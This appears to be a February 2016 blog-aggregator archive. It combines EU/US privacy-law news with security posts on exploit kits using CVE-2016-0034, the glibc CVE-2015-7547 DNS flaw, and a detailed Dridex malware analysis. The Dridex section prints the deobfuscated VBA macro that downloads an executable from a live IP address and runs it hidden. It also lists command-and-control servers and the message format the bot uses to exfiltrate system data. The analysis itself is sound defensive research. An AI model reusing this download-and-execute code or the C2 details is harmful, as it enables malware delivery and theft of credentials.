Monthly Archives: February 2016

European Commission Presents EU-U.S. Privacy Shield

On February 29, 2016, the European Commission issued the legal texts that will implement the EU-U.S. Privacy Shield. These texts include a draft adequacy decision from the European Commission, Frequently Asked Questions and a Communication summarizing the steps that have been taken in the last few years to restore trust in transatlantic data flows.

The agreement in support of the new EU-U.S. transatlantic data transfer framework, known as the EU-U.S. Privacy Shield, was reached on February 2, 2016, between the U.S. Department of Commerce and the European Commission. Once adopted, the adequacy decision will establish that the safeguards provided when transferring personal data pursuant to the new EU-U.S. Privacy Shield are equivalent to the EU data protection standards. In addition, the European Commission has stated that the new framework reflects the requirements that were set forth by the Court of Justice of the European Union (the “CJEU”) in the recent Schrems decision.

The EU-U.S. Privacy Shield

The new framework provides a response to the concerns that have been raised by the European Commission and the CJEU with respect to transatlantic data transfers. It contains stronger commitments that must be undertaken by companies in the commercial sector, but also significant commitments with respect to the U.S. government’s access to personal data. The four most important aspects of the Privacy Shield are:

Enhanced obligations on companies and robust enforcement. Companies that are willing to transfer personal data from the EU to the U.S. must accept more stringent obligations regarding the processing of personal data and how individuals’ rights are guaranteed. Among other limitations introduced by the new framework, onward data transfers will be subject to more onerous requirements and liability provisions.

In addition, the Privacy Shield will include stricter oversight mechanisms to help ensure companies abide by their commitments, including regular monitoring by the U.S. Department of Commerce. In addition, companies will face severe sanctions or exclusion from the framework if they fail to comply.

Limits and safeguards regarding access to personal data by the U.S. government. The European Commission has obtained written assurances from the U.S. government (i.e., the Department of Justice and the Office of the Director of National Intelligence) that access to personal data by government authorities for law enforcement, national security and other public interest purposes will be subject to clear limitations, safeguards and oversight mechanisms.

Effective protection of EU citizens’ privacy rights and redress possibilities. Several affordable mechanisms to obtain individual redress will be available to data subjects who think their personal data has been misused under the new framework, whether via a direct complaint to the company or to their national data protection authority (“DPA”). Complaints made to a DPA will be referred to the U.S. Department of Commerce and the Federal Trade Commission for investigation. When receiving a complaint directly from individuals, companies must reply within 45 days. Companies handling personal data in the Human Resources context about European individuals must comply with the decisions of the competent DPA. In addition, companies also must designate an independent dispute resolution body to investigate and resolve individuals’ complaints and provide complimentary recourse to the individuals.

Further, in the context of a company’s certification, the Department of Commerce will verify that the company complies with the Privacy Principles of the Privacy Shield, and that it has designated an independent recourse mechanism. As a last resort, individuals will be able to bring their complaints to a newly-created Privacy Shield Panel, a dispute resolution body that can take binding and enforceable action against U.S. companies that have certified their adherence to the Privacy Shield.

EU citizens also will have a redress mechanism in the national security context. In particular, an independent Ombudsperson will be responsible for handling complaints and inquiries received from EU individuals regarding access to their data by national intelligence authorities. This redress mechanism will be extended beyond the EU-U.S. Privacy Shield and will be available to individuals for all data transfers to the U.S. for commercial purposes.

Annual joint review mechanism. The European Commission will annually monitor the functionality of all aspects of the EU-U.S. Privacy Shield, together with the U.S. Department of Commerce, EU DPAs, U.S. national security authorities and the Ombudsperson. Other sources of information, such as voluntary transparency reports, will also be used for monitoring the functionality of the framework. In the event that companies or public authorities do not comply with their commitments, the European Commission can activate a process to suspend the Privacy Shield.

Going Forward

The Commission encourages companies to prepare for the Privacy Shield so that they are in a position to self-certify to the new framework as soon as an adequacy decision is adopted by the Commission. In general, the various constituents involved in the new framework will be required to take the following actions in connection with the Privacy Shield:

U.S. Companies. U.S. companies must commit to comply with seven privacy principles, including (1) the Notice Principle, (2) the Choice Principle, (3) the Security Principle, (4) the Data Integrity and Purpose Limitation Principle, (5) the Access Principle, (6) the Accountability for Onward Transfer Principle, and (7) the Recourse, Enforcement and Liability Principle. In addition, the European Commission encourages companies to (i) select the EU DPAs as their complaint resolution mechanism under the Privacy Shield, and (ii) publish transparency reports on national security and law enforcement access requests regarding EU personal data.

U.S. Authorities. U.S. authorities will be responsible for enforcing the framework and respecting the limitations and safeguards established regarding access to personal data by law enforcement and for national security purposes. U.S. authorities also must handle complaints received from EU individuals in a timely and effective manner.

EU Data Protection Authorities. EU DPAs must ensure that individuals can exercise their rights effectively, including by transferring their complaints to the competent U.S. authority, as well as cooperating with the relevant U.S. authority. In particular, EU DPAs must assist complainants with cases brought in front of the Privacy Shield Panel, exercise oversight over transfers of EU HR personal data and trigger the Ombudsperson mechanism.

European Commission. The European Commission will adopt an adequacy decision that will be reviewed regularly, allowing the Privacy Shield to be consistently monitored, in contrast with the previous Safe Harbor.

Next Steps

An extraordinary plenary meeting of the Article 29 Working Party will be organized at the end of March 2016. After obtaining the non-binding opinion of the Working Party and consulting a committee composed of representatives of the EU Member States, a final decision by the College of Commissioners will be made. In the meantime, U.S. authorities will prepare for the implementation of the new framework.

FTC Chairwoman Edith Ramirez issued a statement in response to the release of the new framework. She said that “[t]he EU-U.S. Privacy Shield Framework supports the growing digital economy on both sides of the Atlantic, while ensuring the protection of consumers’ personal information. In providing an important legal mechanism for transatlantic data transfers, it benefits both consumers and business in the global economy.” Chairwoman Ramirez also emphasized the FTC’s role, saying that “the FTC will make enforcement of the new framework a high priority, and we will work closely with our European counterparts to provide robust privacy and data security protections for consumers in the United States and Europe.”

Read the Press Release of the European Commission.

Read the Fact Sheet on the EU-U.S. Privacy Shield.

For more information, visit the dedicated page on the European Commission’s website.

Security Weekly #453 – Jeff Frisk & Jeff Pike, Global Information Assurance Certification

This week on Security Weekly we interview Jeff Pike and Jeff Frisk from SANS GIAC. Paul and Larry talk about digital badges, CPEs, and SANS training. On Security Weekly, Paul, Larry, and Mike talk about the Hacker Summer Camp Planning Guide, Open DNS Blogs, wireless mics and keyboards, and excessive amounts of lube! The best place to get information about security! Stay tuned for the best in security news.

President Obama Signs Judicial Redress Act into Law

On February 24, 2016, President Obama signed the Judicial Redress Act (the “Act”) into law. The Act grants non-U.S. citizens certain rights, including a private right of action for alleged privacy violations that occur in the U.S. The Act was signed after Congress approved an amendment that limits the right to sue to only those citizens of countries which (1) permit the “transfer of personal data for commercial purposes” to the U.S., and (2) do not impose personal data transfer policies that “materially impede” U.S. national security interests.

As we previously reported, the passing of the Judicial Redress Act is an important step that may help facilitate the approval of the new EU-U.S. Privacy Shield by European regulators. It also impacts the 2015 draft agreement known as the Protection of Personal Information Relating to the Prevention, Investigation, Detection and Prosecution of Criminal Offenses (the “Umbrella Agreement”). The Umbrella Agreement was conditioned on the passing of the Judicial Redress Act.

In addition to the private right of action, non-U.S. citizens have other rights that are granted to U.S. citizens under the Privacy Act of 1974. These include the right to request access to records shared by their governments with a U.S. federal agency in the course of a criminal investigation and to amend any inaccuracies in their records.

CJEU Hears Arguments Regarding Whether IP Addresses are Personal Data

On February 25, 2016, the Court of Justice of the European Union (“CJEU”) heard arguments on two questions referred by the German Federal Court of Justice (Bundesgerichtshof). The first question was whether or not IP addresses constitute personal data and therefore cannot be stored beyond what is necessary to provide an Internet service. The German court referred the questions to the CJEU for a preliminary ruling in connection with a case that arose in 2008 when a German citizen challenged the German federal government’s storage of the dynamic IP addresses of users on government websites. The citizen’s claim initially was rejected by the court of first instance. The claim was granted, however, by the court of second instance to the extent it referred to the storage of IP addresses after the users left the relevant government websites. Subsequently, both parties appealed the decision to the German Federal Court of Justice. The CJEU may follow its 2011 decision in which it confirmed that IP addresses are personal data.

The other question referred to the CJEU is whether or not the EU Data Protection Directive 95/46/EC is contrary to a provision in the German Telemedia Act. According to the relevant provision of the Telemedia Act, a website provider may collect and process the personal data of users without their consent only to the extent it is necessary to (1) enable the general functionality of the website or (2) arrange payment.

What’s New with Dridex

Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security

We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam (malware from a spam email) that targets Windows-operated systems with the intent to steal credentials and obtain money from a victim’s bank account.

Malware authors, not surprisingly, always try to come up with something new to avoid detection and make the researcher’s life more difficult. In a quick overview, there is nothing new in the infection sequence of Dridex. But authors of Dridex have made some upgrades and workarounds to avoid detection that we’ll discuss in detail below.

INFECTION CHAIN SUMMARY

 InfectionChain

 

IN-DEPTH ANALYSIS

As most of Dridex samples come through spam, this particular new variant is no different. We recently caught a sample of its email attachment named “Payment Confirmation 98FD41.doc.” Although the attachment is named with a .doc extension, it is not a DOC file format but actually a malformed MHT. MHTs are archived format for web pages that are usually opened with Internet Explorer by default.

HiewMalFormedMHT

The malware author purposely crafted bytes before the string “MIME-version” to signify the start of an actual MHT file. This was done in an attempt to bypass some antivirus scanner engines and wrongfully classify this type of malware as a txt file or any other file format but not MHT.

This MHT file contains an embedded DOC file inside. The DOC file is the one that contains VBA (Visual Basic for Applications) macro codes responsible for downloading and executing Dridex unbeknownst to the user.

In most scenarios where computer systems are running Microsoft Windows, MHT files are loaded through Internet Explorer while DOC files are loaded by Microsoft Word, unless an advanced user changes its default application launcher settings. Because of those default settings, the malware author deliberately altered the extension of its malformed MHT file and changed it into .doc, fooling the system into loading it via Microsoft Word. And if macros are enabled in Microsoft Word, it will continue its infection routine and download and execute Dridex in the background.

As of this blog, executing the “Payment Confirmation 98FD41.doc” in a sandbox environment with macros enabled produces an error in VBA. This is because the site that it supposedly attempts to connect to is now down.

WinWordShot

Pressing Alt+F8 in Microsoft Word takes us to the Macros screen. As you can see, it has two macro functions, AutoOpen and FYFChvhfygDGHds.

Macros

Attempting to click “Edit” will promt a request for a password, which, of course, could be anything.

PasswordMacros

This makes things a bit more challenging, but we can extract the information using a more unconventional method.

Since “Payment Confirmation 98FD41.doc” is actually an MHT file that contains an embedded doc file, the first step is to rename it to an .eml extension “Payment Confirmation 98FD41.eml.” From there, we opened it using Microsoft Outlook (though whatever email client is currently being used will suffice). The embedded objects in “Payment Confirmation 98FD41.doc” have become attachments when renamed to .eml. Then we browsed the attachments and looked for a file that starts with the string “ActiveMime” when viewed in a hex editor.

ConvertedToOutlookEML

This type is of file format is an MSO and could not be read normally by the naked eye. Since this is an old-school malware, we were lucky to have kept an old-school tool called UNMSO.EXE, which, as the name implies, unpacks the MSO. The output of this tool produces a “true” DOC file format. And yes, it holds our malicious VBA macro codes inside.

ActiveMimeToDOCF

Quickly examining the DOC file output, we can see naked strings “http://31.131.24.203/indiana/jones.php” and ”\yFUYIdsf.exe” in the body.

olevbaOutput

We then used a tool called olevba.py (http://www.decalage.info/python/olevba) to extract VBA macro source codes and output its result into a text file.

Typical to any VBA macro malwares, it is obfuscated and contains a bunch of useless codes in an attempt to confuse the researcher analyzing it. The list is pretty lengthly, so only the important ones are listed here.

pjIOHdsfc = UserForm1.TextBox1 (which points to the string http://31.131.24.203/indiana/jones.php)

dTYFidsff = Environ(StrReverse(“PMET”)) & UserForm1.TextBox2 (which points to the string \yFUYIdsf.exe)

Dim erDTFGHJkds As Object

Set erDTFGHJkds = CreateObject(StrReverse(“1.5.tseuqerPTTHniW.PTTHniW”))

erDTFGHJkds.Open StrReverse(“TEG”), pjIOHdsfc, False

erDTFGHJkds.Send

Open dTYFidsff For Binary Access Write As #yFVHJBkdsf

sjdhfbk = Shell(dTYFidsff, vbHide)

VBA Open command is responsible for connecting and downloading Dridex while VBA Shell command is responsible for executing it. In this example, it connects and downloads Dridex in http://31.131.24.203/indiana/jones.php, which is later renamed and executed in %TEMP%\ yFUYIdsf.exe.

DOWNLOADED DRIDEX EXECUTABLE

The downloaded Dridex executable has an MD5 of EBB1562E4B0ED5DB8A646710F3CD2EB8. Analyzing this executable is like an orange, we have to peel-off the outer layer first to get to the good stuff. We can break the Dridex executable further into two parts: The Decoder and the Naked Dridex.

THE DECODER

A quick glance at its entry-point, it looks like a Microsoft Visual C++ 6.0 compiled program. In fact, it is really a Microsoft Visual C++ 6.0 except that the usual code-execution is not followed. That means Dridex codes are inserted right before WINMAIN is called (WINMAIN is the usual go-to entry-point of a C++ 6 compiled executable). This was intended by the malware author in an attempt to hide its code from the researcher. There are also a bunch of useless codes, strings, loops and windows APIs to throw off researchers when debugging.

The code will look for kernel32.VirtualAlloc API by traversing kernel32.dll’s import table and comparing it to the hash of “3A8E4D14h” using its own hashing algorithm.

Decoder-VirtualAllocCalled

It uses the unconventional PUSH DWORD OFFSET – RETN combination instead of a direct CALL DWORD approach to hide its procedures.

PUSH-RETN

Once kernel32.VirtualAlloc has been successfully saved, it will then use the said API to allocate a size of 5A44h bytes in memory in order to decrypt codes and write it to the allocated memory space before transferring execution.

It will then again traverse kernel32.dll in order to get the base image address and populate its API table, which is needed for further unpacking. Using GetProcAddress, it will get the address of the following APIs:

CloseHandle

CreateThread

CreateToolhelp32Snapshot

EnterCriticalSection

EnumServicesStatusExA

FreeConsole

GetCurrentProcessId

GetCurrentThreadId

GlobalAlloc

GlobalFree

InitializeCriticalSection

IsBadReadPtr

LeaveCriticalSection

LeaveCriticalSection

LoadLibraryA

OpenSCManagerA

RegCloseKey

RegOpenKeyExA

RtlDecompressBuffer

RtlZeroMemory

Thread32First

Thread32Next

VirtualAlloc

VirtualFree

VirtualProtect

ZwCreateFile

ZwCreateThread

ZwCreateThreadEx

ZwCreateUserProcess

ZwOpenFile

ZwOpenProcess

ZwProtectVirtualMemory

ZwQueueApcThread

ZwSetContextThread

ZwSetValueKey

ZwSuspendThread

ZwTerminateProcess

ZwWriteVirtualMemory

After a series of debugging obfuscated codes and decrypting, it will finally land on using RTLDecompressBuffer in which an MZ-PE file will be decompressed in memory, after which execution is then transferred using CreateThread. This decompressed executable (we call it Naked Dridex) is detected as Trojan.Win32.Dridex.aa (v) by VIPRE long before. Based on this observation, this variant of the Dridex executable was already caught in the past, hence the reason it is detected by a heuristic pattern by ThreatTrack’s VIPRE Antivirus. The only difference now is that it is wrapped around by a “new” protective layer as a means of bypassing most antivirus engines.

We also made another interesting discovering when debugging: The malware attempts to hide its tracks by using Windows API FreeConsole. Taken from MSDN, FreeConsole detaches the calling process from its console.

PEID

Since this executable is of a Win32 console-type subsystem, you should see a console application popping up and then closing abruptly if you run it in a Windows environment (i.e. double-click “execute”). It only means that it detached itself from the console application but continually runs itself in the background. One way to test this theory is to execute the malware in CMD.EXE and you should see that no inputs will be accepted subsequently. This is because FreeConsole detached the malware from CMD.EXE. Even pushing “CTRL-C,” “CTRL-BREAK” or even closing CMD.EXE altogether will not stop it from progressing.

THE NAKED DRIDEX 

This is where it all gets interesting. Although we have peeled off most of its outer layer, this malware still has plenty of obfuscated codes within it. Note that its Import Address Table is 0, meaning that at some point it will have to populate its IAT.

ZEROIAT

These are the following Windows APIs that will be used:

AllocateAndInitializeSid

CharLowerA

CloseHandle

CommandLineToArgvW

CompareStringA

CreateFileW

CryptAcquireContextW

CryptCreateHash

CryptDestroyHash

CryptGenRandom

CryptGetHashParam

CryptHashData

CryptReleaseContext

DeleteFileW

EqualSid

ExitProcess

ExpandEnvironmentStringsW

FindClose

FindFirstFileW

FindNextFileW

FreeSid

GetCurrentProcess

GetFileAttributesW

GetLastError

GetTokenInformation

GetVersionExW

HeapAlloc

HeapCreate

HeapFree

HeapSize

HeapValidate

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

InternetCloseHandle

InternetConnectW

InternetOpenA

InternetQueryOptionW

InternetReadFile

InternetSetOptionW

IsWow64Process

LoadLibraryW

MultiByteToWideChar

OpenProcessToken

RegCloseKey

RegEnumKeyA

RegOpenKeyExA

RegQueryValueExA

RemoveDirectoryW

RtlComputeCrc32

RtlFillMemory

RtlGetLastWin32Error

RtlMoveMemory

SetFileAttributesW

SetFilePointer

Sleep

WideCharToMultiByte

WTSEnumarateSessionsW

WTSFreeMemory

WTSQueryUserToken

wvnsprintfW

Previous versions of Dridex have CnC configuration that are usually found and is easily decrypted with linear XOR or even seen as plain text format like this in its body:

<config botnet=”xxx”>

   <server_list>

37.139.47.105:80

66.110.179.66:8080

5.39.99.18:80

136.243.237.218:80

   </server_list>

</config>­

However, with this version, settings are located in .data section in hex format just to make it harder for the researcher to distinguish them.

CnCSettingsHiew

Converting them to their ASCII counterpart will have the following settings as:

Bot version: 0x78 = 120

CnC Servers:

0xB9.0x18.0x5C.0xE5:0x1287 = 185.24.92.229:4743

0x67.0xE0.0x53.0x82:0x102F = 103.224.83.130:4143

0x2E.0x65.0x9B.0x35:0x0477 = 46.101.155.53:1143

0x01.0xB3.0xAA.0x07:0x118D = 1.179.170.7:4493

Dridex will collect information to fingerprint the infected system. Data like the Windows version “Service Pack,” computer name, username, install date and installed softwares will be gathered and sent to a CnC server.

A unique module name by the infected system will be generated by computing for the MD5 of combined data of the following registry entries:

Key: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName

Name: ComputerName

Key: HKEY_LOCAL_MACHINE/Volatile Environment

Name: USERNAME

Key: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion

Name: InstallDate

The MD5 result will be appended to the ComputerName joined with the character “_” (e.g. “WINXP_2449c0c0c6a9ffb4e33613709f4db358”).

It will also gather a list of installed software by enumerating the subkeys of HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall and acquiring their “DisplayName” and “DisplayVersion.” It will construct a string using the format “DisplayName (DisplayVersion) separated by “;” for every subkey enumerated.

It will then attempt to delete versions of AVG antivirus in an infected system by searching for its settings in the registry “HKLM/SYSTEM/CurrentControlSet/services/Avg/SystemValues” and traversing the %LocalAppData% folder for its files. It even supported deleting future versions of AVG, from AVG2010 upto AVG2020.

We have noticed, though, that there seems to be an irregularity on the coding part of the malware author because it decrements the value of AVG20(%d) by one where %d starts from 20 (e.g AVG2020, AVG2019, AVG2018, etc.) So when it reaches AVG2010, instead of decrementing to AVG2009, it becomes AVG209, AVG208, AVG207 upto AVG206.

This is the message format that is to be sent to a CnC.

<loader><get_module unique=”%s” botnet=”%d” system=”%d” name=”%s” bit=”%d”/>

Sample message to send:

<loader><get_module unique=”WINXP_2449c0c0c6a9ffb4e33613709f4db358″ botnet=”120″ system=”23120″ name=”list” bit=”32″/><soft><![CDATA[4NT Unicode 6.0 (6.0);AOL Instant Messenger;CodeStuff Starter (5.6.2.0);Compuware DriverStudio 3.2 (3.2);HijackThis 1.99.1 (1.99.1);IDA Pro Advanced v5.0;InstallRite 2.5;mIRC (6.21);PE Explorer 1.96 (1.96);Viewpoint Media Player;VideoLAN VLC media player 0.8.6c(0.8.6c);Windows XP Service Pack 2 (20040803.231319);WinHex;WinPcap 4.0.1 (4.0.0.901);WinRAR archiver;Wireshark 0.99.6a (0.99.6a);Yahoo! Messenger;ActivePerl5.8.3 Build 809 (5.8.809);Debugging Tools for Windows (x86) (6.9.3.113);Microsoft Visual C++ 2008 Redistributable – x86 9.0.30729.4148 (9.0.30729.4148);Python 2.5.1 (2.5.1150);WebFldrs XP (9.50.5318);UltraEdit-32 (10.20c);Java 2 RuntimeEnvironment, SE v1.4.2_15 (1.4.2_15);Microsoft Office Professional Edition 2003 (11.0.5614.0);MSN Messenger 7.0 (7.0.0777);Adobe Reader 6.0 (6.0);VMware Tools (9.6.1.1378637);Compuware DriverStudio (3.2);Starting path: 5]]></soft></loader>

The malware then attempts to connect to its CnC servers using SSL requests by using wininet functions such as InternetConnectW and HttpOpenRequestW. It then sends the data gathered earlier using HttpSendRequestW.

WiresharkCnC

The server will even reply a malicious SSL certificate upon a successful connection. SQUERT identified the Malicious SSL certificate as Dridex.

SQUERTSSL

HiewSSL

The CnC server is supposed to issue a malicious DLL file at this point with an export function of “NotifierInit” and attach it to a running process of EXPLORER.EXE; however, the CnCs in its list are now taken down as of this writing.

WHAT TO DO?

To keep Dridex at bay, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system and security products up to date.
  • Take precaution when opening attachments, especially when sent by an unknown sender.
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Leverage advanced threat defense tools like ThreatSecure Email to protect against spear-phishing and targeted malware attacks that bypass traditional defenses. Cybercriminals have developed increasingly sophisticated attacks to bypass anti-spam and email filtering technologies and infiltrate your network. ThreatSecure Email identifies suspicious emails, detects malicious attachments or links, and stops them before they can reach their target, without relying on signatures.

HASHES

A6844F8480E641ED8FB0933061947587 – malicious MHT attachment (LooksLike.MHT.Malware.a (v))

EBB1562E4B0ED5DB8A646710F3CD2EB8 – Dridex executable (Trojan.Win32.Generic!BT)

 

The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

FTC Settles with Router Manufacturer over Software Security Flaws

On February 23, 2016, the Federal Trade Commission announced that it reached a settlement with Taiwanese-based network hardware manufacturer ASUSTeK Computer, Inc. (“ASUS”), to resolve claims that the company engaged in unfair and deceptive security practices in connection with developing network routers and cloud storage products sold to consumers in the U.S.

The settlement stems from an FTC complaint alleging that ASUS failed to securely design and maintain its network routers and cloud storage applications, which resulted in a number of software vulnerabilities impacting the security of its products and customers’ information. In the complaint, the FTC claimed that despite knowing about these security flaws, the company failed to mitigate them in a timely manner and provide prompt notice to customers about vulnerabilities that placed their network routers and sensitive personal information on network-connected devices at risk of compromise. According to the FTC, these security flaws resulted in hackers compromising thousands of customers’ ASUS routers and network-connected devices, including over 12,900 connected devices, in February 2014. In addition to alleging that the company failed to provide reasonable security in the design and maintenance of the software developed for its routers and related “cloud” features, the FTC’s complaint asserted that ASUS misrepresented the security of its products due to its alleged security failures.

The consent order entered into between ASUS and the FTC requires the company to notify consumers when a software update is available, or when the company is aware of reasonable steps that a consumer could take to mitigate a security flaw. The consent order also requires the company to maintain a comprehensive security program that is reasonably designed to (1) address security risks related to the development and management of new and existing network devices developed by the company, and (2) protect the privacy, security, confidentiality and integrity of individually-identifiable consumer information collected or handled by such devices. The company also is prohibited from misrepresenting the security of its products, including whether or not a product is using up-to-date software.

Files download information




After 7 years of Contagio existence, Google Safe Browsing services notified Mediafire (hoster of Contagio and Contagiominidump files) that "harmful" content is hosted on my Mediafire account.

It is harmful only if you harm your own pc and but not suitable for distribution or infecting unsuspecting users but I have not been able to resolve this with Google and Mediafire.

Mediafire suspended public access to Contagio account.

The file hosting will be moved.

If you need any files now, email me the posted Mediafire links (address in profile) and I will pull out the files and share via other methods.

P.S. I have not been able to resolve "yet" because it just happened today, not because they refuse to help.  I don't want to affect Mediafire safety reputation and most likely will have to move out this time.

The main challenge is not to find hosting, it is not difficult and I can pay for it, but the effort move all files and fix the existing links on the Blogpost, and there are many. I planned to move out long time ago but did not have time for it. If anyone can suggest how to change all Blogspot links in bulk, I will be happy.


P.P.S. Feb. 24 - The files will be moved to a Dropbox Business account and shared from there (Dropbox team confirmed they can host it )  


The transition will take some time, so email me links to what you need. 

Thank you all
M

CVE-2016-0034 (Silverlight up to 5.1.41105.0) and Exploit Kits




Fixed with the January 2016 Microsoft patches, CVE-2016-0034  ( MS16-006 ) is a Silverlight Memory Corruption vulnerability and it has been spotted by Kaspersky with rules to hunt Vitaliy Toropov’s unknown Silverlight exploit mentioned in HackingTeam leak.

Angler EK :

On the 2016-02-18 the landing of Angler changed slightly to integrate this piece of code :

Silverlight integration Snipet from Angler Landing after decoding
2016-02-18

resulting in a new call if silverlight is installed on the computer:

Angler EK replying without body to silverlight call
Here a Pass in great britain dropping Vawtrak via Bedep buildid 7786
2016-02-18
I tried all instances i could find and the same behavior occured on all.

2016-02-22 Here we go : call are not empty anymore.
Angler EK dropping  Teslacrypt via silverlight  5.1.41105.0 after the "EITest" redirect 
2016-02-22
I made a pass with Silverlight : 5.1.41212.0 : safe.

Edit1 : I received confirmation that it's indeed CVE-2016-0034 from multiple analyst including Anton Ivanov (Kaspersky). Thanks !


Xap file : 01ce22f87227f869b7978dc5fe625e16
Dll : 22a9f342eb367ea9b00508adb738d858
Out of topic payload : 6a01421a9bd82f02051ce6a4ea4e2edc (Teslacrypt)
Fiddler sent here

RIG : 
2016-03-29
Malc0de spotted modification in the Rig landing indicating integration of Silverlight Exploit.
Here is a pass where the Silverlight is being fired and successfully exploited. CVE identification by : Anton Ivanov (Kaspersky)
RIG - CVE-2016-0034 - 2016-03-29

Xap file in that pass :  acb74c05a1b0f97cc1a45661ea72a67a080b77f8eb9849ca440037a077461f6b
containing this dll : e535cf04335e92587f640432d4ec3838b4605cd7e3864cfba2db94baae060415
( Out of topic payload : Qbot 3242561cc9bb3e131e0738078e2e44886df307035f3be0bd3defbbc631e34c80 )
Files : Fiddler and sample (password is malware)

Reading :
The Mysterious Case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - 2016-01-13 - Costin Raiu & Anton Ivanov - Kaspersky

Post Publication Reading:
(PDF) Analysis of Angler's new silverlight Exploit - 2016-03-10 - Bitdefender Labs

CNIL Issues Decision Regarding Data Processing for Litigation Purposes

On February 19, 2016, the French Data Protection Authority (“CNIL”) made public its new Single Authorization Decision No. 46 (“Single Authorization AU-46”). This decision relates to the data processing activities of public and private organizations with respect to the preparation, exercise and follow-up regarding disciplinary or court actions, and the enforcement of those actions.

The CNIL observed that, as part of their regular activities, companies may have to prepare and manage claims with customers, vendors, employees or other individuals, to defend their rights. In doing so, companies process personal data that is likely to include data relating to criminal offenses and convictions or security measures.

In principle, companies are not allowed to process such data under French data protection law. However, in a 2004 decision, the French Constitutional Court opined that this should not deprive companies of their right to judicial redress. The CNIL therefore stated that companies may process personal data relating to offenses, convictions and security measures, as victims of an offense. Such data processing requires the CNIL’s specific prior authorization. However, if the data processing complies with all the requirements laid down in Single Authorization AU-46, only a simplified registration must be filed with the CNIL.

Single Authorization AU-46 includes detailed requirements on the types of personal data that may be collected and processed, data retention periods, data recipients and security measures that must be implemented. If these requirements are not met, an authorization request must be filed with the CNIL.

The purpose of Single Authorization AU-46 is to reduce the administrative burden of companies’ registration formalities, in light of the future EU General Data Protection Regulation that will abolish their registration obligation.

I Might Be Afraid Of This Ghost

CVE-2015-7547 is not actually the first bug found in glibc’s DNS implementation.  A few people have privately asked me how this particular flaw compares to last year’s issue, dubbed “Ghost” by its finders at Qualys.  Well, here’s a list of what that flaw could not exploit:

apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql, nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd, pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers, vsftpd, xinetd.

And here are the results from a few minutes of research on the new bug.

ruhroh

More is possible, but I think the point is made.  The reason why the new flaw is significantly more virulent is that:

  • This is a flaw in getaddrinfo(), which modern software actually uses nowadays for IPv6 compatibility, and
  • Ghost was actually a really “fiddly” bug, in a way CVE-2015-7547 just isn’t.

As it happens, Qualys did a pretty great writeup of Ghost’s mitigating factors, so I’ll just let the experts speak for themselves:

  • The gethostbyname*() functions are obsolete; with the advent of IPv6, recent applications use getaddrinfo() instead.
  • Many programs, especially SUID binaries reachable locally, use gethostbyname() if, and only if, a preliminary call to inet_aton() fails. However, a subsequent call must also succeed (the “inet-aton” requirement) in order to reach the overflow: this is impossible, and such programs are therefore safe.
  • Most of the other programs, especially servers reachable remotely, use gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also known as full-circle reverse DNS) checks. These programs are generally safe, because the hostname passed to gethostbyname() has normally been pre-validated by DNS software:
    • . “a string of labels each containing up to 63 8-bit octets, separated by dots, and with a maximum total of 255 octets.” This makes it impossible to satisfy the “1-KB” requirement.
    • Actually, glibc’s DNS resolver can produce hostnames of up to (almost) 1025 characters (in case of bit-string labels, and special or non-printable characters). But this introduces backslashes (‘\\’) and makes it impossible to satisfy the “digits-and-dots” requirement.

And:

In order to reach the overflow at line 157, the hostname argument must meet the following requirements:

  • Its first character must be a digit (line 127).
    – Its last character must not be a dot (line 135).
    – It must comprise only digits and dots (line 197) (we call this the “digits-and-dots” requirement).
  • It must be long enough to overflow the buffer. For example, the non-reentrant gethostbyname*() functions initially allocate their buffer with a call to malloc(1024) (the “1-KB” requirement).
  • It must be successfully parsed as an IPv4 address by inet_aton() (line 143), or as an IPv6 address by inet_pton() (line 147). Upon careful analysis of these two functions, we can further refine this “inet-aton” requirement:
    • It is impossible to successfully parse a “digits-and-dots” hostname as an IPv6 address with inet_pton() (‘:’ is forbidden). Hence it is impossible to reach the overflow with calls to gethostbyname2() or gethostbyname2_r() if the address family argument is AF_INET6.
    • Conclusion: inet_aton() is the only option, and the hostname must have one of the following forms: “a.b.c.d”, “a.b.c”, “a.b”, or “a”, where a, b, c, d must be unsigned integers, at most 0xfffffffful, converted successfully (ie, no integer overflow) by strtoul() in decimal or octal (but not hexadecimal, because ‘x’ and ‘X’ are forbidden).

Like I said, fiddly, thus giving Qualys quite a bit of confidence regarding what was and wasn’t exploitable.  By contrast, the constraints on CVE-2015-7547 are “IPv6 compatible getaddrinfo”.  That ain’t much.  The bug doesn’t even care about the payload, only how much is delivered and if it had to retry.

It’s also a much larger malicious payload we get to work with.  Ghost was four bytes (not that that’s not enough, but still).

In Ghost’s defense, we know that flaw can traverse caches, requiring far less access for attackers.  CVE-2015-7547 is weird enough that we’re just not sure.

A Skeleton Key of Unknown Strength

TL;DR:  The glibc DNS bug (CVE-2015-7547) is unusually bad.  Even Shellshock and Heartbleed tended to affect things we knew were on the network and knew we had to defend.  This affects a universally used library (glibc) at a universally used protocol (DNS).  Generic tools that we didn’t even know had network surface (sudo) are thus exposed, as is software written in programming languages designed explicitly to be safe. Who can exploit this vulnerability? We know unambiguously that an attacker directly on our networks can take over many systems running Linux.  What we are unsure of is whether an attacker anywhere on the Internet is similarly empowered, given only the trivial capacity to cause our systems to look up addresses inside their malicious domains.

